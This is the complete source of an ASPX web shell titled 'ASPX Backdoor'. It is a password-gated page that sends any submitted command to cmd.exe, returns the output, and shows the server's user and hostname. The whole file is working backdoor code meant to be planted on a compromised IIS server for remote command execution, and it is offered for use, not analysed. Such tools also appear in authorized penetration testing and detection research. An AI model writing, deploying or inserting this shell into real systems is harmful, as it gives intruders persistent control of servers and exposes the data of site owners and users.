<%@ Page Language="C#" Debug="false" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">

    // =====================================================================
    // Setup global password necessary to pass before using that webshell.

    public string Password = "5eQzrXZHZwJNLvm6Q2b7PR6r";
    
    // =====================================================================

    void Page_Load(object sender, EventArgs e)
    {
        PasswordTextbox.Attributes["value"] = Request.Form["PasswordTextbox"];
        PasswordTextbox.Attributes["type"] = "password";
        PasswordTextbox.Text = Request.Form["PasswordTextbox"];
        CommandTextbox.Value = Request.Form["CommandTextbox"];
    }

    string ExecuteCommand(string arg)
    {
        if (arg.Length >= 1)
        {
            ProcessStartInfo psi = new ProcessStartInfo();
            psi.FileName = "cmd.exe";
            psi.Arguments = "/c \""+ arg + "\"";
            psi.RedirectStandardOutput = true;
            psi.UseShellExecute = false;
            Process p = Process.Start(psi);
            StreamReader stmrdr = p.StandardOutput;
            string s = stmrdr.ReadToEnd();
            stmrdr.Close();
            return s;
        }
        return "";
    }
    
    void Launch_OnClick(object sender, System.EventArgs e)
    {
        if (Request.Form["PasswordTextbox"] == Password) 
        {
            string h = Server.HtmlEncode(ExecuteCommand("hostname")).Trim();
            string u = Server.HtmlEncode(ExecuteCommand("whoami")).Trim();

            Hostname.Text = u + "@" + h;
            CommandOutput.InnerHtml = Server.HtmlEncode(ExecuteCommand(Request.Form["CommandTextbox"]));
        }
        else 
        {
            Hostname.Text = "unknown";
            CommandOutput.InnerHtml = "Wrong password provided.";
        }
    }

</script>
<!DOCTYPE html>
<html>
    <head>
        <title>ASPX Backdoor</title>
        <script>
            function setPassword()
            {
                document.getElementById("PasswordTextbox").type = 'password';
            }
        </script>
    </head>
    <body onload='setPassword()'>

        <h3>ASPX Backdoor.</h3>
        <i style="font-size:9px">You need to provide valid password in order to leverage RCE.</i>
        <br/>
        <font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
        <br/>
        <hr/>
        <form id="cmd" method="post" runat="server">
        <table style="width:100%">
            <tr>
                <td width="40%">
                    <b style="color:red">Password:</b>
                </td>
                <td width="60%">
                    <asp:TextBox runat='server' id="PasswordTextbox" style="width:30%"></asp:TextBox>
                </td>
            </tr>
            <tr>
                <td width="40%">
                    <b style="color:blue"></b>
                    <asp:Label id="Hostname" runat='server'></asp:Label>
                </td>
                <td width="60%">
                    <input type=text id="CommandTextbox" runat="server" value='' onClick="" style="width:80%" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }"/>
                </td>
            </tr>
            <tr>
                <td width="40%">
                </td>
                <td width="60%">
                    <asp:Button id="Launch" runat="server" Text="Execute" OnClick="Launch_OnClick"></asp:Button>
                </td>
            </tr>
        </table>
        </form>
        <hr />
        <pre id="CommandOutput" runat='server' style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"></pre>
    </body>
</html>